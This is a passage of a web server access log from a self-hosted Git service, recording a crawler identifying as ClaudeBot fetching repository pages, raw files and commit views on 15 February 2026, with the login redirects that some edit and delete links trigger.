AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 11534] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 28009] [Gzip 5.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore?display=source" [Client 216.73.216.188] [Length 12220] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 15193] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2F.venv%2Fbin" [Client 216.73.216.188] [Length 19391] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 24134] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 18127] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14410] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 11543] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.vscode" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 11540] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 216.73.216.188] [Length 11082] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs?display=rendered" [Client 216.73.216.188] [Length 11213] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 14317] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 216.73.216.188] [Length 11781] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md?display=rendered" [Client 216.73.216.188] [Length 13441] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 216.73.216.188] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 19885] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" [Client 216.73.216.188] [Length 10967] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 453289] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 11550] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 18126] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11905] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11665] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11913] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3.12" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md?display=source" [Client 216.73.216.188] [Length 15375] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fdotenv" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 11236] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 